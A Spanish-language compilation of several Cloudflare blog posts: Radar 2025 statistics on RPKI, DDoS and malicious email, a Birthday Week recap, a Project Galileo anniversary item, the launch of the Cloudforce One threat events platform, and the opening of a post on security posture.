Comenzamos el año 2025 con un 50 % de rutas IPv4 válidas, que aumentaron hasta el 53,9 % el 2 de diciembre. La proporción de rutas IPv6 válidas aumentó hasta el 60,1 %, lo que supone un incremento de 4,7 puntos porcentuales. Si nos fijamos en la cuota global del espacio de direcciones IP cubierto por rutas válidas, IPv4 aumentó hasta el 48,5 %, lo que supone un incremento de tres puntos porcentuales. La cuota del espacio de direcciones IPv6 cubierto por rutas válidas descendió ligeramente hasta el 61,6 %. Aunque la variación interanual de estas métricas se está ralentizando, hemos logrado un progreso significativo en los últimos cinco años. Desde principios de 2020, la cuota de rutas IPv4 válidas RPKI y el espacio de direcciones IPv4 se han multiplicado por tres aproximadamente.

^{Cuota de entradas de enrutamiento válidas RPKI globales por versión IP en 2025}

^{Cuota del espacio de direcciones IP anunciado a nivel mundial cubierto por rutas válidas RPKI en 2025}

Barbados experimentó el mayor crecimiento en la cuota de rutas IPv4 válidas, aumentando del 2,2 % al 20,8 %. En cuanto a rutas IPv6 válidas, Malí experimentó el mayor crecimiento porcentual en 2025, pasando del 10,0 % al 58,3 %. 

Barbados también experimentó el mayor aumento en la cuota de espacio IPv4 cubierto por rutas válidas, pasando de solo el 2 % al 18,6 %. En cuanto al espacio de direcciones IPv6, tanto Tayikistán como Dominica pasaron de no tener prácticamente ningún espacio cubierto por rutas válidas a principios de año, al 5,5 % y al 3,5 % respectivamente. 

En nuestra serie de informes trimestrales sobre DDoS (primer, segundo, tercer trimestre), hemos destacado la frecuencia y el tamaño cada vez mayores de los ataques hipervolumétricos a la capa de red dirigidos a los clientes de Cloudflare y a nuestra infraestructura. Definimos un "ataque hipervolumétrico a la capa de red" como aquel que opera en las capas 3/4 y que alcanza picos de más de un terabit por segundo (1 TB/s) o más de 1000 millones de paquetes por segundo. Estos informes ofrecen una perspectiva trimestral, pero también queríamos mostrar una visión general de la actividad a lo largo del año para comprender cuándo los atacantes son más activos y cómo el tamaño de los ataques ha crecido con el tiempo. 

Si analizamos la actividad de los ataques hipervolumétricos en 2025 desde la perspectiva de los TB/s, julio fue el mes con mayor número de ataques de este tipo, con más de 500, mientras que febrero fue el mes con menos, con poco más de 150. La intensidad de los ataques se mantuvo generalmente por debajo de 5 TB/s, aunque un ataque de 10 TB/s bloqueado a finales de agosto fue un presagio de lo que estaba por venir. Este ataque fue el primero de una campaña de ataques de más de 10 TB/s que tuvo lugar durante la primera semana de septiembre, antes de una serie de ataques de más de 20 TB/s durante la última semana del mes. A principios de octubre, se observaron varios ataques hipervolumétricos cada vez más grandes, y el mayor del mes alcanzó un pico de 29,7 TB/s. Sin embargo, ese récord pronto se vio eclipsado, ya que un ataque a principios de noviembre alcanzó los 31,4  TB/s.

Desde la perspectiva de miles de millones de paquetes por segundo, la actividad de ataques hipervolumétricos fue mucho menor. Noviembre fue el mes con mayor actividad (más de 140 ataques), mientras que solo se registraron tres en febrero y junio. La intensidad de los ataques a lo largo del año se mantuvo generalmente por debajo de 4000 millones de paquetes por segundo hasta finales de agosto, aunque se observó una sucesión de ataques cada vez mayores durante los meses siguientes, alcanzando su punto máximo en octubre. Aunque la intensidad de la mayoría de los más de 110 ataques bloqueados en octubre fue inferior a 5000 millones de paquetes por segundo, un ataque de 14 000 millones de paquetes por segundo detectado durante el mes fue el mayor ataque volumétrico en paquetes por segundo bloqueado durante el año, superando a otros cinco ataques sucesivos que batieron récords y que se produjeron en septiembre.

^{Tamaño máximo de los ataques DDoS en 2025}

Las estadísticas recientes sugieren que el correo electrónico sigue siendo el principal canal de comunicación para los contactos empresariales externos, a pesar del creciente uso empresarial de aplicaciones de colaboración / mensajería. Debido a su amplio uso empresarial, los atacantes aún lo consideran un punto de entrada atractivo a las redes corporativas. Las herramientas de IA generativa facilitan la creación de correos electrónicos maliciosos muy específicos que imitan de manera convincente a marcas de confianza o remitentes legítimos (como ejecutivos de empresas), pero que contienen enlaces engañosos, archivos adjuntos peligrosos u otros tipos de amenazas. Cloudflare Email Security protege a los clientes de los ataques al correo electrónico, incluidos los que se llevan a cabo a través de mensajes de correo electrónico maliciosos selectivos. 

En 2025, se descubrió que, de media, el 5,6 % de los correos electrónicos analizados por Cloudflare eran maliciosos. El porcentaje de mensajes procesados por Cloudflare Email Security que se identificaron como maliciosos generalmente osciló entre el 4 % y el 6 % durante la mayor parte del año. Nuestros datos muestran un aumento en la proporción de correos electrónicos maliciosos a partir de octubre, probablemente debido a la mejora del sistema de clasificación implementado por Cloudflare Email Security.  

^{Tendencias globales en el intercambio de correos electrónicos maliciosos en 2025}

Los enlaces engañosos fueron la principal categoría de amenaza de correo electrónico malicioso en 2025, presentes en el 52 % de los mensajes, un incremento desde el 43 % en 2024. Dado que el texto que se muestra para un hipervínculo en HTML se puede configurar de forma arbitraria, los atacantes pueden hacer que una URL parezca que enlaza con un sitio inofensivo cuando, en realidad, enlaza con un recurso malicioso que se puede utilizar para robar credenciales de inicio de sesión o descargar malware. El porcentaje de correos electrónicos procesados que contenían enlaces engañosos alcanzó el 70 % a finales de abril y, de nuevo, a mediados de noviembre.

El fraude de identidad se produce cuando un atacante envía un correo electrónico haciéndose pasar por otra persona. Pueden hacerlo utilizando dominios que parecen similares, que son falsos o que utilizan trucos con el nombre que se muestra para que parezca que proceden de un dominio de confianza. La suplantación de marca es una forma de engaño de identidad en la que un atacante envía un mensaje de phishing que se hace pasar por una empresa o marca reconocible. La suplantación de marca también puede usar la suplantación de nombre para mostrar o la suplantación de dominio. El fraude de identidad (38 %) y la suplantación de marca (32 %) fueron amenazas que aumentaron un 35 % y un 23 % respectivamente, en 2025 con respecto a 2024. Ambos registraron un aumento a mediados de noviembre.

^{Tendencias en las categorías de amenazas por correo electrónico en 2025, a nivel mundial}

Además de proporcionar información sobre el tráfico, la distribución geográfica y los certificados digitales de los dominios de nivel superior (TLD) como .com o .us, Cloudflare Radar también ofrece información sobre los TLD "más utilizados de forma indebida", es decir, aquellos cuyos dominios, según hemos detectado, son los que generan la mayor parte de los correos electrónicos maliciosos y spam entre los mensajes analizados por Cloudflare Email Security. El análisis se basa en el TLD del dominio remitente, que se encuentra en el encabezado "De:" de un mensaje de correo electrónico. Por ejemplo, si un mensaje procede de sender@example.com, entonces example.com es el dominio de envío, y .com es el TLD asociado. Para el análisis de este informe, solo incluimos los TLD de los que observamos un promedio mínimo de 30 mensajes por hora.

Según los mensajes analizados a lo largo de 2025, descubrimos que .christmas y .lol fueron los TLD más utilizados para fines maliciosos, ya que el 99,8 % y el 99,6 % de los mensajes procedentes de estos TLD, respectivamente, se caracterizaron como spam o maliciosos. Si ordenamos la lista de TLD por porcentaje de correos maliciosos, .cfd y .sbs tenían más del 90 % de los correos analizados clasificados como maliciosos. El TLD .best fue el peor en cuanto a porcentaje de spam, y un 69 % de los mensajes se clasificaron como spam.

^{TLD que han originado la mayor parte del correo electrónico malicioso y spam en 2025}

Aunque Internet y la web siguen evolucionando y cambiando con el tiempo, parece que algunas de las métricas clave se han vuelto bastante estables. Sin embargo, prevemos que otras métricas, como las que rastrean las tendencias de la IA, evolucionarán en los próximos años a medida que este campo siga avanzando a buen ritmo. 

Te animamos a que visites el micrositio del Resumen del año 2025 de Cloudflare Radar, explores las tendencias de tu país o región y consideres cómo pueden afectar a tu organización a la hora de planificar el año 2026. También puedes obtener información casi en tiempo real sobre muchas de estas métricas y tendencias en Cloudflare Radar. Y, como se ha señalado anteriormente, para obtener información sobre los principales servicios de Internet en múltiples categorías industriales y países / regiones, te recomendamos que leas la entrada del blog "Resumen del año".

Si tienes alguna pregunta, puedes ponerte en contacto con el equipo de Cloudflare Radar en radar@cloudflare.com o en las redes sociales en @CloudflareRadar (X), https://noc.social/@cloudflareradar (Mastodon) y radar.cloudflare.com (Bluesky).

Como dice el refrán, se necesita todo un equipo para hacer posible nuestro Resumen del año, desde la recopilación y el análisis de los datos hasta la creación del micrositio y el desarrollo del contenido asociado. Me gustaría expresar mi agradecimiento a los miembros del equipo que han contribuido al esfuerzo de este año: Jorge Pacheco, Sabina Zejnilovic, Carlos Azevedo, Mingwei Zhang, Sofia Cardita (análisis de datos); André Páscoa, Nuno Pereira (desarrollo frontend); João Tomé (servicios de Internet más populares); David Fidalgo, Janet Villarreal y el equipo de internacionalización (traducciones); Jackie Dutton, Kari Linder, Guille Lasarte (comunicaciones); Laurel Wamsley (edición del blog); y Paula Tavares (gestión de ingeniería), así como a otros compañeros de Cloudflare por vuestro apoyo y ayuda.

Cada año, durante la Semana aniversario, lanzamos los productos y funciones que creemos que Internet necesita en ese momento y en el futuro cercano. Durante la Semana aniversario de años anteriores, lanzamos una gran variedad de soluciones, como la puerta de enlace IPv6 en 2011, Universal SSL en 2014, Cloudflare Workers y la protección contra DDoS ilimitada en 2017, Cloudflare Radar en 2020, el almacenamiento de objetos R2 sin tarifas de salida en 2021, las actualizaciones poscuánticas para Cloudflare Tunnel en 2022 y Workers AI y Encrypted Client Hello en 2023. Estos son tan solo algunos ejemplos.

Los temas de este año se han centrado en cómo podemos ayudar a preparar Internet para un nuevo modelo de monetización que fomente la publicación de contenido de calidad, un modelo que promueva más oportunidades para el desarrollo de una comunidad dentro y fuera de Cloudflare, así como misiones permanentes como poner más funciones a disposición de todos los usuarios y mejorar continuamente la velocidad y la seguridad de nuestras soluciones.

Este año hemos lanzado muchas novedades. Por si te has perdido las docenas de publicaciones del blog, aquí tienes un resumen de todas las novedades anunciadas durante la Semana aniversario 2025. 

Lunes, 22 de septiembre

Martes, 23 de septiembre

Miércoles, 24 de septiembre

Jueves, 25 de septiembre

Viernes, 26 de septiembre

Nuestra misión de ayudar a mejorar Internet siempre ha ido más allá de la tecnología. La comunidad de personas que forman los equipos que ayudan a mejorar Internet es tan importante para su futuro como los anuncios sobre becarios o sobre la colaboración en nuestras oficinas. Esta semana, hemos lanzado nuestro conjunto de iniciativas más ambicioso hasta la fecha con el objetivo de apoyar a los desarrolladores, fundadores de empresas y estudiantes que están creando el futuro.

Para los fundadores de empresas y startups, estamos encantados de dar la bienvenida al grupo n.º 6 a Workers Launchpad, nuestro programa acelerador que ofrece a las empresas en fase inicial los recursos que necesitan para crecer. Pero esto no es todo. Abrimos nuestras puertas, literalmente, lanzando nuevos centros físicos para startups en nuestras oficinas de San Francisco, Austin, Londres y Lisboa. Estos espacios ofrecerán acceso a asesoría, recursos y una comunidad de otros desarrolladores.

También estamos invirtiendo en la nueva generación de talento. Anunciamos el acceso gratuito a la plataforma para desarrolladores de Cloudflare disponible para todos los estudiantes, brindándoles las herramientas necesarias para aprender y experimentar sin límites. Asimismo, para facilitar la transición desde la etapa formativa al mundo laboral, hemos anunciado nuestro objetivo de contratar a 1111 becarios en 2026, nuestro mayor compromiso hasta la fecha para respaldar a los futuros líderes tecnológicos.

La mejora de Internet es para todos. Ampliamos nuestro apoyo a las organizaciones sin ánimo de lucro y de interés público, ofreciéndoles acceso gratuito a nuestras herramientas para desarrolladores en entornos de producción, para que puedan concentrarse en su misión.

Tanto si eres un fundador de una empresa y tienes una idea fantástica, como si eres un estudiante que acaba de empezar, o bien formas parte de un equipo que trabaja por una causa en la que crees, queremos ayudarte a tener éxito.

Queremos dar las gracias a nuestros clientes, a nuestra comunidad y a los millones de desarrolladores que confían en nosotros para ayudarles a desarrollar, proteger y acelerar Internet. Tu curiosidad y tus comentarios impulsan nuestra innovación.

Han sido 15 años increíbles. Y, como siempre: esto es solo el comienzo.

Muchas cosas han cambiado desde que celebramos el 10.º aniversario del proyecto Galileo. Sin embargo, nuestro compromiso sigue siendo el mismo: ayudar a garantizar que las organizaciones que realizan una labor fundamental en materia de derechos humanos tengan acceso a las herramientas que necesitan para mantenerse en línea.  Creemos que las organizaciones, independientemente del lugar del mundo en el que se encuentren, merecen una protección fiable y accesible para continuar con su importante trabajo sin interrupciones.

Con motivo de nuestro 11.º aniversario, nos complace compartir algunas novedades, entre ellas:

• Un informe interactivo Cloudflare Radar que ofrece información sobre las ciberamenazas a las que se enfrentan las organizaciones de interés público en riesgo protegidas por el proyecto. 

• Un mayor compromiso con los derechos digitales en la región de Asia-Pacífico con la incorporación de dos nuevos socios al proyecto Galileo.

• Nuevas historias de organizaciones protegidas por el proyecto Galileo que trabajan en la primera línea de la sociedad civil, los derechos humanos y el periodismo de todo el mundo.

Para conmemorar el 11.º aniversario del proyecto Galileo, hemos publicado un nuevo informe Radar que incluye datos sobre los ciberataques contra organizaciones protegidas por el programa. Ofrece información sobre los tipos de amenazas a las que se enfrentan estos grupos, con el objetivo de apoyar mejor a los investigadores, la sociedad civil y los grupos vulnerables mediante la promoción de las mejores prácticas de ciberseguridad. Entre las ideas clave se incluyen:

• Nuestros datos indican una tendencia al alza de los ataques DDoS contra estas organizaciones, que se están volviendo más comunes que los intentos de explotar vulnerabilidades tradicionales de las aplicaciones web.

• Entre el 1 de mayo de 2024 y el 31 de marzo de 2025, Cloudflare bloqueó 108 900 millones de ciberamenazas contra organizaciones protegidas por el proyecto Galileo. Esto supone una media de casi 325,2 millones de ciberataques al día durante un periodo de 11 meses, lo que supone un aumento del 241% con respecto a nuestro informe Radar de 2024. 

• Los periodistas y las organizaciones de noticias sufrieron el mayor volumen de ataques, de hecho se bloquearon más de 97 000 millones de solicitudes como amenazas potenciales en 315 organizaciones diferentes. El pico de ataque de tráfico se registró el 28 de septiembre de 2024. En segundo lugar se situó la categoría de derechos humanos / organizaciones de la sociedad civil, en la que se bloquearon 8900 millones de solicitudes, y el pico de actividad de los ataques se produjo el 8 de octubre de 2024.

• Cloudflare incorporó el Centro de investigación de Bielorrusia, una organización de periodismo independiente, el 27 de septiembre de 2024, cuando ya estaba siendo objeto de ataque. El 28 de septiembre se produjo un importante ataque DDoS a la capa de aplicación, que generó más de 28 000 millones de solicitudes en un solo día. 

• Muchos de los objetivos eran medios de comunicación de investigación que operaban en regiones sometidas a presión gubernamental (como Rusia y Bielorrusia), así como ONG dedicadas a la lucha contra el racismo y el extremismo, y a la defensa de los derechos de los trabajadores.

• Tech4Peace, una organización de derechos humanos centrada en los derechos digitales, fue objeto de un ataque de 12 días que comenzó el 10 de marzo de 2025 y que generó más de 2700 millones de solicitudes. El ataque consistió en ataques prolongados de menor intensidad y ráfagas cortas de alta intensidad. Esta variación intencionada en las tácticas revela un enfoque coordinado, que muestra cómo los atacantes adaptaron sus métodos a lo largo del ataque.

El informe completo Radar incluye información adicional sobre organizaciones de interés público, grupos de derechos humanos y civiles, organizaciones medioambientales y organizaciones implicadas en desastres y ayuda humanitaria. El panel de control también es un recurso valioso para los responsables políticos, los investigadores y los defensores que trabajan para proteger a las organizaciones de interés público en todo el mundo.

Las asociaciones son fundamentales para el éxito del proyecto Galileo. Contamos con 56 organizaciones de la sociedad civil de confianza de todo el mundo para que nos ayuden a identificar y a apoyar a los grupos que podrían beneficiarse de nuestra protección. Con la ayuda de nuestros socios, estamos ampliando nuestro alcance para proporcionar herramientas a las comunidades que más necesitan protección. Hoy, nos complace dar la bienvenida a dos nuevos socios al proyecto Galileo que defienden los derechos digitales, las tecnologías abiertas y la sociedad civil en Asia y en todo el mundo. 

EngageMedia es una organización sin ánimo de lucro que aúna la defensa de causas, los medios de comunicación y la tecnología para promover los derechos digitales, la tecnología abierta y segura y los documentales sobre temas sociales. Con sede en la región de Asia-Pacífico, EngageMedia colabora con agentes del cambio y comunidades de base para proteger los derechos humanos, la democracia y el medio ambiente.

Como parte de nuestra colaboración, Cloudflare ha participado este año en un taller tecnológico (2025 Tech Camp) para defensores de los derechos humanos organizado por EngageMedia, que reunió a unos 40 activistas y tecnólogos de toda la región Asia-Pacífico. Entre otras cosas, el taller se centró en desarrollar habilidades prácticas en seguridad digital y resistencia de los sitios web contra las amenazas en línea. Cloudflare habló sobre los vectores de ataque más comunes contra organizaciones sin ánimo de lucro y grupos de derechos humanos, tales como los ataques DDoS, el phishing y la desfiguración de sitios web, y compartió cómo el proyecto Galileo ayuda a las organizaciones a mitigar estos riesgos. También analizamos cómo promover mejor las herramientas de seguridad digital entre los grupos vulnerables. El taller fue una oportunidad valiosa para escuchar y aprender de organizaciones que trabajan en primera línea, que nos ofrecieron ideas que siguen dando forma a nuestro enfoque para crear soluciones de seguridad eficaces e impulsadas por la comunidad.

Fundada en 2014 por líderes de las comunidades tecnológicas abiertas de Taiwán, la Open Culture Foundation (OCF) apoya los esfuerzos para proteger los derechos digitales, promover la tecnología cívica y fomentar la colaboración abierta entre el Gobierno, la sociedad civil y la comunidad tecnológica. A través de nuestra asociación, nuestro objetivo es apoyar a más de 34 organizaciones locales de la sociedad civil en Taiwán proporcionándoles formación y talleres para ayudarlas a gestionar la infraestructura de sus sitios web, abordar vulnerabilidades como los ataques DDoS y realizar investigaciones continuas para hacer frente a los desafíos de seguridad a los que se enfrentan estas comunidades.

Seguimos inspirándonos en el increíble trabajo y la dedicación de las organizaciones que participan en el proyecto Galileo. Ayudar a proteger a estas organizaciones y permitirles centrarse en su trabajo es una parte fundamental para ayudar a mejorar Internet. Estas son algunas de sus historias:

• Fair Future Foundation (Indonesia): organización sin ánimo de lucro que presta servicios sanitarios y educativos y facilita el acceso a recursos básicos como agua potable y electricidad en zonas ultra rurales del sudeste asiático. 

• Youth Initiative for Human Rights (Serbia): red regional de ONG que promueve los derechos humanos, el activismo juvenil y la reconciliación en los Balcanes.

• Centro de investigación de Bielorrusia (Bielorrusia): organización de medios de comunicación que lleva a cabo investigaciones exhaustivas sobre la corrupción, la evasión de sanciones y la desinformación en Bielorrusia y las regiones vecinas. 

• The Greenpeace Canada Education Fund (GCEF) (Canadá): organización sin ánimo de lucro que lleva a cabo estudios, investigaciones y educación pública sobre el cambio climático, la biodiversidad y la justicia medioambiental. 

• Insight Crime (Latinoamérica): grupo de expertos sin ánimo de lucro y organización de medios de comunicación que investiga y analiza la delincuencia organizada y la seguridad ciudadana en Latinoamérica y el Caribe. 

• Diez.md (Moldavia): plataforma de noticias moldava enfocada en los jóvenes que ofrece contenido en rumano y ruso sobre temas como educación, cultura, temas sociales, supervisión de elecciones y noticias. 

• Engage Media (APAC): organización sin ánimo de lucro dedicada a defender los derechos digitales y a apoyar a los defensores de los derechos humanos, la democracia y la sostenibilidad medioambiental en Asia-Pacífico. 

• Pussy Riot (Europa): colectivo artístico y activista feminista global que utiliza el arte, el espectáculo y la acción directa para desafiar el autoritarismo y las violaciones de los derechos humanos. 

• Immigrant Legal Resource Centre (Estados Unidos): trabaja para promover los derechos de los inmigrantes, ofrece formación jurídica, desarrolla materiales educativos, aboga por políticas justas y presta apoyo a organizaciones comunitarias.

• 5wf Foundation (Países Bajos): organización sin ánimo de lucro dedicada a la conservación de la vida silvestre que apoya a equipos de conservación de primera línea en todo el mundo proporcionando equipos para proteger las especies y los ecosistemas amenazados.

Estos casos prácticos ofrecen una perspectiva de la naturaleza diversa y global de las amenazas a las que se enfrentan estos grupos, así como del papel fundamental que desempeña la ciberseguridad para garantizar vuestra seguridad en Internet. Echa un vistazo a sus historias y mucho más: https://www.cloudflare.com/es-es/project-galileo-case-studies/

En 2025, muchos de nuestros socios del proyecto Galileo se han enfrentado a importantes recortes de financiación, lo que ha afectado a sus operaciones y a su capacidad para apoyar a las comunidades, defender los derechos humanos y defender los valores democráticos. Garantizar el apoyo continuo a esos servicios, a pesar de los desafíos financieros y logísticos, es más importante que nunca. Agradecemos a nuestros socios de la sociedad civil que siguen ayudándonos a identificar los grupos que necesitan nuestro apoyo. Juntos, estamos trabajando para mejorar la seguridad, la resiliencia y la disponibilidad de Internet para todos. Para obtener más información sobre el proyecto Galileo y cómo apoya a las organizaciones en riesgo de todo el mundo, visita https://www.cloudflare.com/es-es/galileo/.

Para ayudarte a resolver estos desafíos, nos complace lanzar nuestra plataforma de eventos de amenazas para los clientes de Cloudforce One. Cada día, Cloudflare bloquea miles de millones de ciberamenazas. Esta nueva plataforma contiene datos contextuales sobre las amenazas que supervisamos y mitigamos en la red de Cloudflare, y está diseñada para proporcionar a los profesionales de la seguridad y a los responsables de la toma de decisiones información útil desde una perspectiva global. 

De media, procesamos 71 millones de solicitudes HTTP por segundo y 44 millones de consultas DNS por segundo. Este volumen de tráfico nos proporciona información valiosa y una visión integral de las amenazas actuales (en tiempo real). La nueva plataforma de eventos de amenazas aprovecha la información sobre este tráfico para ofrecer una visión integral y en tiempo real de la actividad de las amenazas que se producen en Internet. Esto permite a los clientes de Cloudforce One proteger mejor sus activos y responder más eficazmente a las amenazas emergentes.

El gran volumen de las actividades de amenazas observadas en la red de Cloudflare sobrecargaría a cualquier analista de sistemas o SOC. Por este motivo, organizamos esta actividad en una secuencia de eventos que incluyen no solo indicadores de riesgo (IOC), sino también el contexto, lo que facilita la adopción de medidas basadas en los datos únicos de Cloudflare. Para empezar, exponemos los eventos relacionados con los ataques de denegación de servicio (DOS) observados en nuestra red, junto con las operaciones de amenazas avanzadas identificadas por nuestro equipo de información de Cloudforce One, como la diversidad de herramientas, técnicas y procedimientos utilizados en las amenazas de las que estamos haciendo un seguimiento. Asignamos los eventos al marco MITRE ATT&CK y a las etapas de la cadena de eliminación de seguridad cibernética. En el futuro, añadiremos eventos relacionados con el tráfico bloqueado por nuestro firewall de aplicaciones web (WAF), Zero Trust Gateway, Zero Trust Email Security Business Email Compromise y muchos otros conjuntos de datos propios de Cloudflare. Juntos, estos eventos proporcionarán a nuestros clientes una visión detallada de la actividad de las amenazas que se producen en Internet.

Cada evento de nuestra lista de eventos de amenazas resume la actividad de amenaza específica que hemos observado, de forma similar a un objeto de avistamiento STIX2, y proporciona información contextual en su vista resumida, detallada y mediante la asignación a las etapas MITRE ATT&Ck y KillChain. Para ver una entrada de ejemplo, consulta la documentación de la API.

Nuestro objetivo es ayudar a los clientes a comprender mejor el panorama de las amenazas proporcionándoles información clave que les permita investigar y abordar cuestiones generales y específicas sobre las amenazas contra su organización. Por ejemplo:

• ¿Quiénes lanzan ataques contra mi vertical de negocio?

• ¿Quiénes lanzan ataques contra mi país?

• ¿Qué indicadores puedo utilizar para bloquear los ataques contra mis verticales?

• ¿Qué ha estado haciendo un ciberdelincuente en la cadena de eliminación de seguridad cibernética durante un periodo de tiempo?

Cada evento tiene un identificador único que lo vincula con la actividad de amenaza identificada, lo que permite a nuestros analistas de la información sobre amenazas de Cloudforce One proporcionar contexto adicional en las investigaciones posteriores.

Decidimos utilizar la plataforma para desarrolladores de Cloudflare para desarrollar la plataforma de eventos de amenazas, ya que nos permitía aprovechar la versatilidad y la perfecta integración de Cloudflare Workers. En esencia, la plataforma es un Cloudflare Worker que utiliza Durable Objects respaldado por SQLite para almacenar los eventos observados en la red de Cloudflare. Optamos por utilizar Durable Objects en lugar de D1, la solución de base de datos SQL sin servidor de Cloudflare, porque nos permite crear dinámicamente tablas SQL donde almacenar conjuntos de datos personalizables de forma única. Este método de almacenamiento de los conjuntos de datos permite que los eventos de amenazas se distribuyan en toda nuestra red, lo que nos ofrece resiliencia ante los picos de datos que podrían estar correlacionados con la naturaleza impredecible de los ataques en Internet. También nos permite controlar los eventos según la fuente de datos, compartir un subconjunto de los conjuntos de datos con socios de confianza o restringir el acceso solo a los usuarios autorizados.  Por último, los metadatos de cada evento de amenaza individual se almacenan en Durable Object KV para que podamos almacenar los datos contextuales más allá de nuestros campos fijos de búsqueda. Estos datos pueden incluir desde el número de solicitudes por segundo en el caso de nuestros eventos de denegación de servicio hasta información que permita a los analistas de Cloudforce One vincular el evento a la actividad de amenaza exacta para una investigación más detallada.

Los clientes de Cloudforce One pueden acceder a los eventos de amenazas a través del panel de control de Cloudflare en el Centro de seguridad o mediante la API de eventos de amenazas de Cloudforce One. Ambos exponen el flujo de actividad de amenaza que se produce en Internet tal y como lo ve Cloudflare, y se pueden personalizar mediante filtros definidos por el usuario. 

En el panel de control de Cloudflare, los usuarios tienen acceso a una vista cronológica de las acciones del atacante, diseñada para responder a preguntas estratégicas, así como a una tabla de eventos más granular para acceder a información más detallada sobre el ataque. Este enfoque garantiza que los usuarios tengan la información más relevante al alcance de su mano.

La tabla de eventos es una vista detallada del Centro de seguridad donde los usuarios pueden acceder a información más detallada sobre la actividad de amenaza específica filtrada según varios criterios. Aquí es donde los usuarios pueden explorar eventos de amenaza específicos y campañas de ciberdelincuentes utilizando la información del tráfico de Cloudflare. Y lo que es más importante, esta tabla proporcionará a nuestros usuarios indicadores de riesgo prácticos y un resumen de los eventos para que puedan proteger adecuadamente sus servicios. Todos los datos disponibles en nuestra tabla de eventos son igualmente accesibles a través de la API de eventos de amenazas de Cloudforce One. 

Para mostrar la eficacia de los eventos de amenazas, analicemos un caso real:

Los chats filtrados recientemente de la organización criminal Black Basta expusieron detalles sobre sus víctimas, sus métodos y sus compras de infraestructura. Aunque no podemos confirmar si los chats filtrados fueron manipulados de alguna manera, pudimos verificar fácilmente la infraestructura mencionada en los chats. Como resultado, esta información sobre amenazas ahora está disponible como eventos en los eventos de amenazas, junto con un contexto adicional único de Cloudflare. 

Los analistas que buscan dominios, hosts y muestras de archivos utilizados por Black Basta pueden aprovechar los eventos de amenazas para obtener valiosa información sobre las operaciones de estos ciberdelincuentes. Por ejemplo, en la interfaz de usuario de eventos de amenazas, un usuario puede filtrar la columna "Atacante" seleccionando "BlackBasta" en el menú desplegable, como se muestra en la imagen siguiente. Esto proporciona una lista organizada de direcciones IP verificadas, dominios y hash de archivos para una investigación más detallada. Para obtener información más detallada sobre la visibilidad única de Cloudflare sobre la actividad de amenaza de Black Basta, consulta nuestra publicación El error de Black Basta: explotación de los chats filtrados de la organización criminal.

Nuestros clientes afrontan infinidad de ciberamenazas que pueden interrumpir sus operaciones y poner en riesgo sus datos confidenciales. Los ciberdelincuentes son cada vez más sofisticados, por lo que la necesidad de tener información sobre amenazas relevante y a tiempo es mayor que nunca. Por este motivo, presentamos los eventos de amenazas, que proporcionan información más detallada sobre estas amenazas. 

La plataforma de eventos de amenazas tiene como objetivo llenar este vacío ofreciendo una visión más detallada y contextualizada de la actividad de amenaza en curso. Esta función permite a los analistas acceder por su cuenta a la información sobre los incidentes y analizarlos mediante filtros personalizables, por lo que pueden identificar patrones y responder de forma más eficaz. Al proporcionar acceso a los datos sobre amenazas en tiempo real, ayudamos a las organizaciones a tomar mejores decisiones sobre sus estrategias de seguridad.

Para validar el valor de nuestra plataforma de eventos de amenazas, un equipo de información sobre amenazas de la lista Fortune 20 la puso a prueba. Realizaron un análisis comparativo con otras 110 fuentes de información sobre amenazas, y consideraron a Cloudflare como la principal fuente de información sobre amenazas. Concluyeron que somos únicos en el campo de la información sobre amenazas. Todavía es pronto, pero los primeros comentarios que hemos recibido confirman que nuestra información no solo es única, sino que también ofrece un valor excepcional a los responsables de la ciberseguridad.

Si bien los clientes de Cloudforce One ya tienen acceso a nuestra API y a nuestro panel de control, lo que les permite integrar perfectamente la información sobre amenazas en sus sistemas existentes, pronto también tendrán acceso a más visualizaciones y análisis de los eventos de amenazas que les permitirán comprender mejor sus hallazgos e informar sobre ellos. Esta próxima interfaz de usuario incluirá visualizaciones cronológicas mejoradas de los ataques, resúmenes de las campañas y gráficos de los ataques, que proporcionarán información aún más detallada sobre las amenazas que afronta tu organización. Además, añadiremos la capacidad de integración con las plataformas SIEM existentes y compartiremos los indicadores en todos los sistemas.

Aquí puedes obtener más información sobre la investigación de la información sobre amenazas que publica nuestro equipo, o bien puedes ponerte en contacto con tu equipo de cuenta para saber cómo aprovechar nuestros nuevos eventos de amenazas para mejorar tu postura de ciberseguridad. 

Para respaldar las necesidades relacionadas tanto con la continuidad como con la seguridad de las actividades empresariales, "la seguridad debe pasar de reactiva a predictiva". Garantizar una postura de seguridad adecuada implica supervisar y reforzar tus defensas de seguridad para identificar los riesgos, asegurar el cumplimiento normativo y protegerte contra las amenazas en constante evolución. Con nuestras funciones más recientes, ahora puedes utilizar Cloudflare para una postura de seguridad adecuada en tus aplicaciones SaaS y web. Esto responde a la pregunta final (y diaria) de cualquier equipo de seguridad: ¿Hasta qué punto están protegidos nuestros activos y documentos?

Una postura de seguridad predictiva se basa en los siguientes componentes clave:

• Detección e inventario en tiempo real de todos tus activos y documentos

• Detección continua de las amenazas y evaluación continua de los riesgos en función de los activos

• Sugerencias sobre la prioridad de las correcciones para mejorar tu protección

Hoy compartimos cómo hemos desarrollado estos componentes clave en las aplicaciones SaaS y web, y cómo puedes utilizarlos para gestionar la postura de seguridad de tu empresa.

Independientemente de las aplicaciones que hayas conectado a la red global de Cloudflare, Cloudflare analiza activa y periódicamente los riesgos y los errores de configuración asociados a cada una de ellas. La información sobre los riesgos y los errores de configuración identificados se muestran en el panel de control del Centro de seguridad.

La información se agrupa según la gravedad, el tipo de riesgo y la solución de Cloudflare correspondiente, y te ofrece diversas perspectivas para centrarte en aquello que más te interese. Cuando corresponde, se proporciona una solución con un solo clic para los tipos de información seleccionados, como establecer la la versión mínima de TLS en 1.2, que es lo que recomienda PCI DSS. Esta simplicidad es valorada muy positivamente por los clientes que gestionan un conjunto cada vez mayor de activos implementados en toda la organización.

Para acelerar aún más la resolución, recientemente hemos añadido el control de acceso basado en roles (RBAC) a la página Información sobre seguridad en el panel de control de Cloudflare. Ahora, cada profesional de la seguridad tiene acceso a una vista depurada de la información relevante según sus responsabilidades. Un usuario con una función administrativa (un CSO, por ejemplo) puede ver y acceder a toda la información.

Además de la información de seguridad de toda la cuenta, también proporcionamos información general sobre la postura de seguridad que más se aproxime a las configuraciones de seguridad correspondientes de tus aplicaciones web y SaaS. Analicemos cada uno de ellos.

